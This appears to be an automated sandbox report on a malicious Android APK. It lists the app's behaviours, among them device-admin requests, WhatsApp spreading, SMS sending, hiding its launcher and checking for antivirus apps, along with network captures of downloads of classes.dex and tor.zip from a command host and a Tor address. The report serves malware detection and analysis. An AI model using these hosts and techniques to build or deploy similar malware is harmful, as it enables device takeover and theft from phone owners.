Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report AS4FMH9hKE

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:835017
Start date:10.04.2019
Start time:13:12:50
Joe Sandbox Product:Cloud
Overall analysis duration:0h 4m 54s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:AS4FMH9hKE
Cookbook file name:defaultandroidfilecookbook.jbs
Analysis system description:Android 7.1 Nougat
APK Instrumentation enabled:true
Detection:MAL
Classification:mal88.spre.troj.spyw.evad.and@0/253@1/0
Warnings:
Show All
  • No interacted views
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Not all non-executed APIs are in report
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size exceeded maximum capacity and may have missing dynamic data code.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold880 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Mitre Att&ck Matrix

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: AS4FMH9hKEvirustotal: Detection: 15%Perma Link

Privilege Escalation:

barindex
Checks if the device administrator is activeShow sources
Source: ru.delivery.collapse.g;->e:57API Call: android.app.admin.DevicePolicyManager.isAdminActive
Tries to add a new device administratorShow sources
Source: Lru/delivery/collapse/a;->a([B)Ljava/lang/String;Method string: "android.app.action.ADD_DEVICE_ADMIN"

Spreading:

barindex
May send Whatsapp messages (likely to spread)Show sources
Source: Lru/delivery/collapse/a;->a([B)Ljava/lang/String;Method string: "com.whatsapp:id/send"

Networking:

barindex
Found Tor addressesShow sources
Source: Lx/x/x/a/a;-><init>(Landroid/content/Context;Landroid/content/Intent;)VMethod string: "http://un6kqz7yotjtuqwi.onion"
Checks an internet connection is availableShow sources
Source: com.a.a.a.a.b$a$1;->run:11API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.a.a.a.a.b$a$1;->run:12API Call: android.net.NetworkInfo.isConnected
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.68
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Source: unknownTCP traffic detected without corresponding DNS query: 108.177.127.188
Opens an internet connectionShow sources
Source: ru.delivery.collapse.h;->a:11API Call: java.net.URL.openConnection("http://cdn1e699bdc.com/classes.dex")
Source: ru.delivery.collapse.h;->a:11API Call: java.net.URL.openConnection("http://cdn1e699bdc.com/tor.zip")
Source: a.a.a.a.e.b.c;->a:7API Call: java.net.Socket.connect (not executed)
Source: a.a.a.a.e.c.f;->a:107API Call: java.net.Socket.connect (not executed)
Source: x.x.x.e$b;->a:12API Call: java.net.Socket.connect (not executed)
Performs DNS lookups (Java API)Show sources
Source: a.a.a.a.i.c.q;->a:3API Call: java.net.InetAddress.getAllByName (not executed)
Source: a.a.a.a.e.c.d;->a:5API Call: java.net.InetAddress.getByName (not executed)
Downloads compressed data via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.10.3Date: Wed, 10 Apr 2019 11:13:36 GMTContent-Type: application/zipContent-Length: 2305692Last-Modified: Sun, 17 Mar 2019 03:40:15 GMTConnection: keep-aliveETag: "5c8dc19f-232e9c"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 6c aa f5 4c 81 20 fa 00 10 2e 23 00 dc f4 67 00 03 00 00 00 74 6f 72 6c dd 0f 5c cd d7 ff 07 f0 8f ad e9 56 b7 dc 72 e3 a6 70 ab 5b 6b 5b 88 6e fa 77 4b 94 2d 84 4c a6 59 9b 10 da 64 6b 84 d0 c8 96 69 d6 68 64 b2 b5 69 13 cb 16 42 26 34 62 b1 46 b3 d0 ac 4d 08 cd 37 93 ad 6d 21 b4 f9 bd ce f6 d9 fb 7d f4 f8 fd 1e 8f 7e f6 fc 9e cf 3d 9f 7f e7 73 fe 7d ce 39 9f a5 c3 63 9e ec d2 a5 8b f2 df ff 3d ac f8 28 42 a6 87 ad 15 33 fe 2d 6a 9d 29 fe e7 47 cc 8a 51 d1 20 cc 55 31 28 5d f1 3f 98 a5 3f a5 cb bf 7f 56 ca bf 7f 0f 8b ff bd 0b ff 75 57 fe fd b3 e2 4d 1f f8 bf bc 05 f1 ff fc 3d 22 a0 fb 37 bc 38 3d 5e 29 ce fe f7 2f 39 ed 21 25 f9 c7 87 94 ae 6a f8 43 f8 27 7d de b3 4a fa f2 7f ff 34 5d 94 7f fe ba aa fb 18 f7 73 5a 92 f2 ff f
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.10.3Date: Wed, 10 Apr 2019 11:13:36 GMTContent-Type: application/zipContent-Length: 2305692Last-Modified: Sun, 17 Mar 2019 03:40:15 GMTConnection: keep-aliveETag: "5c8dc19f-232e9c"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 6c aa f5 4c 81 20 fa 00 10 2e 23 00 dc f4 67 00 03 00 00 00 74 6f 72 6c dd 0f 5c cd d7 ff 07 f0 8f ad e9 56 b7 dc 72 e3 a6 70 ab 5b 6b 5b 88 6e fa 77 4b 94 2d 84 4c a6 59 9b 10 da 64 6b 84 d0 c8 96 69 d6 68 64 b2 b5 69 13 cb 16 42 26 34 62 b1 46 b3 d0 ac 4d 08 cd 37 93 ad 6d 21 b4 f9 bd ce f6 d9 fb 7d f4 f8 fd 1e 8f 7e f6 fc 9e cf 3d 9f 7f e7 73 fe 7d ce 39 9f a5 c3 63 9e ec d2 a5 8b f2 df ff 3d ac f8 28 42 a6 87 ad 15 33 fe 2d 6a 9d 29 fe e7 47 cc 8a 51 d1 20 cc 55 31 28 5d f1 3f 98 a5 3f a5 cb bf 7f 56 ca bf 7f 0f 8b ff bd 0b ff 75 57 fe fd b3 e2 4d 1f f8 bf bc 05 f1 ff fc 3d 22 a0 fb 37 bc 38 3d 5e 29 ce fe f7 2f 39 ed 21 25 f9 c7 87 94 ae 6a f8 43 f8 27 7d de b3 4a fa f2 7f ff 34 5d 94 7f fe ba aa fb 18 f7 73 5a 92 f2 ff f
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /classes.dex HTTP/1.1User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: cdn1e699bdc.comConnection: Keep-AliveAccept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /classes.dex HTTP/1.1User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: cdn1e699bdc.comConnection: Keep-AliveAccept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /tor.zip HTTP/1.1User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: cdn1e699bdc.comConnection: Keep-AliveAccept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /tor.zip HTTP/1.1User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: cdn1e699bdc.comConnection: Keep-AliveAccept-Encoding: gzip
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: cdn1e699bdc.com
Urls found in memory or binary dataShow sources
Source: androidString found in binary or memory: http://cdn1e699bdc.com/
Source: androidString found in binary or memory: http://cdn1e699bdc.com/classes.dex
Source: androidString found in binary or memory: http://cdn1e699bdc.com/tor.zip
Source: ojppuqmhxc.xmlString found in binary or memory: http://schemas.android.com/apk/res/android
Source: classes.dex.drString found in binary or memory: http://un6kqz7yotjtuqwi.onion
Source: classes.dex.dr, androidString found in binary or memory: http://www.slf4j.org/codes.html#StaticLoggerBinder
Source: classes.dex.dr, androidString found in binary or memory: http://www.slf4j.org/codes.html#loggerNameMismatch
Source: classes.dex.dr, androidString found in binary or memory: http://www.slf4j.org/codes.html#multiple_bindings
Source: classes.dex.dr, androidString found in binary or memory: http://www.slf4j.org/codes.html#substituteLogger
Source: classes.dex.drString found in binary or memory: http://www.slf4j.org/codes.html#substituteLoggerKSee
Source: classes.dex.dr, androidString found in binary or memory: http://www.slf4j.org/codes.html#unsuccessfulInit
Source: classes.dex.dr, androidString found in binary or memory: http://www.slf4j.org/codes.html#version_mismatch
Source: classes.dex.drString found in binary or memory: https://plus.google.com/
Uses HTTP for connecting to the internetShow sources
Source: ru.delivery.collapse.h;->a:12API Call: com.android.okhttp.internal.huc.HttpURLConnectionImpl.connect
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 51166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
Source: unknownNetwork traffic detected: HTTP traffic on port 51156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170

Spam, unwanted Advertisements and Ransom Demands:

barindex
Blocks or controls phone keysShow sources
Source: ru.delivery.collapse.StrollCharacteristic;->c:38API Call: android.app.KeyguardManager.newKeyguardLock
Source: x.x.x.b.a;-><init>:9API Call: android.app.KeyguardManager.newKeyguardLock
Dials phone numbersShow sources
Source: x.x.x.c.b;->a:30API Call: android.content.Context.startActivity
Has permission to perform phone calls in the backgroundShow sources
Source: submitted apkRequest permission: android.permission.CALL_PHONE
Has permission to send SMS in the backgroundShow sources
Source: submitted apkRequest permission: android.permission.SEND_SMS
Has permission to write to the SMS storageShow sources
Source: submitted apkRequest permission: android.permission.WRITE_SMS
May block phone calls / Accesses private ITelephony interfaceShow sources
Source: x.x.x.a.c;-><init>:6API Call: java.lang.Class.getDeclaredMethod("getITelephony")
Sends SMS using SmsManagerShow sources
Source: x.x.x.b;->a:67API Call: android.telephony.SmsManager.sendTextMessage

Operating System Destruction:

barindex
Deletes other packagesShow sources
Source: x.x.x.d.b;->onReceive:23API Call: android.content.Context.startActivity
Lists and deletes files in the same contextShow sources
Source: com.a.a.b.c;->d:274API Calls in same method context: File.listFiles,File.delete
Source: com.a.a.b.a;->c:53API Calls in same method context: File.listFiles,File.delete

Change of System Appearance:

barindex
May access the Android keyguard (lock screen)Show sources
Source: AndroidManifest.xmlString found in binary or memory: android.permission.CALL_PHONE#android.permission.DISABLE_KEYGUARD
Source: classes.dexString found in binary or memory: 5Landroid/app/KeyguardManager$KeyguardDismissCallback;
Source: classes.dexString found in binary or memory: *Landroid/app/KeyguardManager$KeyguardLock;
Source: classes.dexString found in binary or memory: Landroid/app/Application;5Landroid/app/KeyguardManager$KeyguardDismissCallback;*Landroid/app/KeyguardManager$KeyguardLock;
Source: classes.dexString found in binary or memory: Landroid/app/KeyguardManager;
Source: classes.dexString found in binary or memory: Landroid/app/KeyguardManager;"Landroid/app/Notification$Builder;
Source: classes.dexString found in binary or memory: disableKeyguard
Source: classes.dexString found in binary or memory: isKeyguardLocked
Source: classes.dexString found in binary or memory: keyguard
Source: classes.dexString found in binary or memory: newKeyguardLock
Source: classes.dexString found in binary or memory: requestDismissKeyguard
Source: classes.dex.drString found in binary or memory: Landroid/app/FragmentManager;!Landroid/app/FragmentTransaction;5Landroid/app/KeyguardManager$KeyguardDismissCallback;*Landroid/app/KeyguardManager$KeyguardLock;
Source: classes.dex.drString found in binary or memory: Landroid/app/KeyguardManager;)Landroid/app/Notification$Action$Builder;!Landroid/app/Notification$Action;'Landroid/app/Notification$BigTextStyle;"Landroid/app/Notification$Builder;
Acquires a wake lockShow sources
Source: ru.delivery.collapse.StrollCharacteristic;->c:44API Call: android.os.PowerManager$WakeLock.acquire
Source: x.x.x.a.d;-><init>:47API Call: android.os.PowerManager$WakeLock.acquire
Source: x.x.x.b.a;-><init>:16API Call: android.os.PowerManager$WakeLock.acquire

System Summary:

barindex
Requests to ignore battery optimizationsShow sources
Source: Lru/delivery/collapse/a;->a([B)Ljava/lang/String;Method string: "android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"
Executes native commandsShow sources
Source: com.a.a.b.c;->a:178API Call: java.lang.ProcessBuilder.start
Requests potentially dangerous permissionsShow sources
Source: submitted apkRequest permission: android.permission.CALL_PHONE
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.READ_CONTACTS
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: submitted apkRequest permission: android.permission.SEND_SMS
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Source: submitted apkRequest permission: android.permission.WRITE_SMS
Classification labelShow sources
Source: classification engineClassification label: mal88.spre.troj.spyw.evad.and@0/253@1/0
Reads shares settingsShow sources
Source: ru.delivery.collapse.b;-><init>:9API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.auth.api.signin.a.a;->b:34API Call: android.content.SharedPreferences.getString

Data Obfuscation:

barindex
Found very long method stringsShow sources
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10138
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 533333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10178
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 113333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10031
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 123333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10150
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10202
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 153333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10081
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 163333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10164
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 173333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10173
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 183333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10009
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 203333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10105
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 213333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10057
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 233333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10057
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 263333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10170
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 323333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10237
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10210
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 343333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10081
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 373333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10002
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 383333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10085
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 393333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10006
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 403333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10080
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 413333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10019
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 423333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10002
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 453333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10011
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 483333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10134
Source: Ly/s/h/Zggcssyr;-><init>()VMethod string: 493333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 Length: 10222
Obfuscates method namesShow sources
Source: AS4FMH9hKETotal valid method names: 17%
Uses reflectionShow sources
Source: ru.delivery.collapse.h$1;->run:12API Call: Real call: x.x.x.TorController@bcd9864
Source: ru.delivery.collapse.h$1;->run:12API Call: Real call: public void x.x.x.TorController.execute(android.content.Context,android.content.Intent)
Source: ru.delivery.collapse.h$1;->run:12API Call: Real call: x.x.x.TorController@bcd9864
Source: x.x.x.a.c;-><init>:8API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.b.b;->a:9API Call: java.lang.reflect.Field.get
Source: a.a.a.a.e.c.f;->a:143API Call: java.lang.reflect.Method.invoke
Source: a.a.a.a.b.e.a;->a:4API Call: java.lang.reflect.Method.invoke
Source: x.x.x.b;->a:64API Call: java.lang.reflect.Method.invoke

Persistence and Installation Behavior:

barindex
Creates filesShow sources
Source: com.a.a.b.c;->i:50API Call: java.io.FileWriter.<init>
Source: com.a.a.b.c;->i:75API Call: java.io.FileWriter.<init>
Source: com.a.a.b.c;->i:75API Call: java.io.FileWriter.<init>
Source: com.a.a.b.c;->i:75API Call: java.io.FileWriter.<init>
Source: com.a.a.b.c;->i:75API Call: java.io.FileWriter.<init>
Source: com.a.a.b.c;->i:75API Call: java.io.FileWriter.<init>
Source: com.a.a.b.c;->i:75API Call: java.io.FileWriter.<init>
Source: com.a.a.b.c;->i:75API Call: java.io.FileWriter.<init>

Boot Survival:

barindex
Has permission to execute code after phone rebootShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to get activate on phone screen on)Show sources
Source: ru.delivery.collapse.StrollCharacteristic;->c:43API Call: android.os.PowerManager.newWakeLock
Source: x.x.x.a.d;-><init>:46API Call: android.os.PowerManager.newWakeLock
Source: x.x.x.b.a;-><init>:15API Call: android.os.PowerManager.newWakeLock

Hooking and other Techniques for Hiding and Protection:

barindex
Removes its application launcher (likely to stay hidden)Show sources
Source: x.x.x.a.a;-><init>:55API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Uses Crypto APIsShow sources
Source: a.a.a.a.i.a.d;->b:6API Call: java.security.MessageDigest.getInstance
Source: a.a.a.a.i.a.d;->c:73API Call: java.security.MessageDigest.digest
Source: a.a.a.a.i.a.d;->c:92API Call: java.security.MessageDigest.digest
Source: a.a.a.a.i.a.d;->c:126API Call: java.security.MessageDigest.digest
Source: a.a.a.a.i.a.d;->c:152API Call: java.security.MessageDigest.digest
Source: a.a.a.a.i.a.g;->close:5API Call: java.security.MessageDigest.digest
Source: a.a.a.a.i.a.g;->write:8API Call: java.security.MessageDigest.update
Source: a.a.a.a.i.a.g;->write:12API Call: java.security.MessageDigest.update
Source: a.a.a.a.i.a.j$a;->l:110API Call: javax.crypto.Cipher.getInstance
Source: a.a.a.a.i.a.j$a;->l:111API Call: javax.crypto.Cipher.init
Source: a.a.a.a.i.a.j$a;->l:112API Call: javax.crypto.Cipher.doFinal
Source: a.a.a.a.i.a.j$a;->l:114API Call: javax.crypto.Cipher.getInstance
Source: a.a.a.a.i.a.j$a;->l:115API Call: javax.crypto.Cipher.init
Source: a.a.a.a.i.a.j$a;->l:116API Call: javax.crypto.Cipher.doFinal
Source: a.a.a.a.i.a.j$b;-><init>:3API Call: java.security.MessageDigest.getInstance
Source: a.a.a.a.i.a.j$b;-><init>:5API Call: java.security.MessageDigest.update
Source: a.a.a.a.i.a.j$b;-><init>:7API Call: java.security.MessageDigest.digest
Source: a.a.a.a.i.a.j$b;-><init>:16API Call: java.security.MessageDigest.update
Source: a.a.a.a.i.a.j$b;->a:24API Call: java.security.MessageDigest.update
Source: a.a.a.a.i.a.j$b;->a:26API Call: java.security.MessageDigest.digest
Source: a.a.a.a.i.a.j$b;->a:29API Call: java.security.MessageDigest.update
Source: a.a.a.a.i.a.j$b;->a:31API Call: java.security.MessageDigest.digest
Source: a.a.a.a.i.a.j;->a:35API Call: java.security.MessageDigest.getInstance
Source: a.a.a.a.i.a.j;->a:36API Call: java.security.MessageDigest.update
Source: a.a.a.a.i.a.j;->a:37API Call: java.security.MessageDigest.update
Source: a.a.a.a.i.a.j;->a:38API Call: java.security.MessageDigest.digest
Source: a.a.a.a.i.a.j;->b:66API Call: javax.crypto.Cipher.getInstance
Source: a.a.a.a.i.a.j;->b:69API Call: javax.crypto.Cipher.init
Source: a.a.a.a.i.a.j;->b:70API Call: javax.crypto.Cipher.doFinal
Source: a.a.a.a.i.a.j;->d:104API Call: javax.crypto.Cipher.getInstance
Source: a.a.a.a.i.a.j;->d:105API Call: javax.crypto.Cipher.init
Source: a.a.a.a.i.a.j;->d:106API Call: javax.crypto.Cipher.doFinal
Source: a.a.a.a.i.a.j;->d:107API Call: javax.crypto.Cipher.init
Source: a.a.a.a.i.a.j;->d:108API Call: javax.crypto.Cipher.doFinal
Source: a.a.a.a.i.a.j;->d:109API Call: javax.crypto.Cipher.init
Source: a.a.a.a.i.a.j;->d:110API Call: javax.crypto.Cipher.doFinal
Source: a.a.a.a.i.a.j;->f:137API Call: javax.crypto.Cipher.getInstance
Source: a.a.a.a.i.a.j;->f:138API Call: javax.crypto.Cipher.init
Source: a.a.a.a.i.a.j;->f:139API Call: javax.crypto.Cipher.doFinal
Source: a.a.a.a.i.a.j;->f:140API Call: javax.crypto.Cipher.init
Source: a.a.a.a.i.a.j;->f:141API Call: javax.crypto.Cipher.doFinal

Malware Analysis System Evasion:

barindex
Accesses android OS build fieldsShow sources
Source: x.x.x.a.d;-><init>:14Field Access: android.os.Build.BRAND
Source: x.x.x.a.d;-><init>:18Field Access: android.os.Build.MODEL
Queries several sensitive phone informationsShow sources
Source: Lx/x/x/a/d;-><init>(Landroid/content/Context;Landroid/content/Intent;)VMethod string: "android"
Source: Lx/x/x/f;->a()VMethod string: "type"
Source: La/a/a/a/i/d/y;->a()Ljava/lang/String;Method string: "version"
Source: Lx/x/x/a/c;-><init>(Landroid/content/Context;)VMethod string: "phone"
Source: Lx/x/x/a/d;-><init>(Landroid/content/Context;Landroid/content/Intent;)VMethod string: "model"
Source: Lx/x/x/f;->a()VMethod string: "time"
Queries the unique operating system id (ANDROID_ID)Show sources
Source: x.x.x.f;->a:6API Call: android.provider.Settings.Secure.getString

Anti Debugging:

barindex
Creates a new dex file (likely to load a new code)Show sources
Source: ru.delivery.collapse.h;->a:35API Call: java.io.File.<init> /data/user/0/ru.delivery.collapse/app_dex/classes.dex
Source: ru.delivery.collapse.h;->b:50API Call: java.io.File.<init> /data/user/0/ru.delivery.collapse/app_dex/classes.dex
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /classes.dex HTTP/1.1User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: cdn1e699bdc.comConnection: Keep-AliveAccept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /classes.dex HTTP/1.1User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: cdn1e699bdc.comConnection: Keep-AliveAccept-Encoding: gzip

Language, Device and Operating System Detection:

barindex
Queries the SIM provider name (SPN - Service Provider Name)Show sources
Source: x.x.x.a.d;->a:66API Call: android.telephony.TelephonyManager.getSimOperatorName returned ""
Queries the network operator nameShow sources
Source: x.x.x.a.d;->a:69API Call: android.telephony.TelephonyManager.getNetworkOperatorName returned "Swisscom Ltd"

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
May check for install Android security applications (AV and firewalls)Show sources
Source: Lx/x/x/d/b;-><clinit>()VMethod string: "com.kms.free"
Source: Lx/x/x/d/b;-><clinit>()VMethod string: "com.eset.ems2.gp"
Source: Lx/x/x/d/b;-><clinit>()VMethod string: "com.eset.ems2.megafon"
Source: Lx/x/x/d/b;-><clinit>()VMethod string: "com.drweb"
Source: Lx/x/x/d/b;-><clinit>()VMethod string: "com.avast.android.mobilesecurity"

